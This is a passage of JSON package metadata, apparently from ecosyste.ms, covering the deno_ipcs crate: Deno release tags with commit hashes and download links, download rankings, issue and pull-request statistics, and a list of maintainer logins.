31f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-07T11:48:25.851Z","dependent_packages_count":0,"downloads":2308,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":96.4957004557579,"dependent_repos_count":25.634361534778744,"dependent_packages_count":33.99531184908382,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":52.041791279873486},"purl":"pkg:cargo/deno_ipcs","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_ipcs","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_ipcs","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_ipcs/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-06T13:00:35.403Z","issues_count":6650,"pull_requests_count":9667,"avg_time_to_close_issue":17138573.200682055,"avg_time_to_close_pull_request":1530522.5908357133,"issues_closed_count":3810,"pull_requests_closed_count":8052,"pull_request_authors_count":589,"issue_authors_count":2489,"avg_comments_per_issue":2.5046616541353384,"avg_comments_per_pull_request":0.7208027309403124,"merged_pull_requests_count":7030,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":673,"past_year_pull_requests_count":1190,"past_year_avg_time_to_close_issue":1344289.2103004293,"past_year_avg_time_to_close_pull_request":1305317.8687782804,"past_year_issues_closed_count":233,"past_year_pull_requests_closed_count":663,"past_year_pull_request_authors_count":190,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.2332838038632987,"past_year_avg_comments_per_pull_request":1.134453781512605,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":496,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyar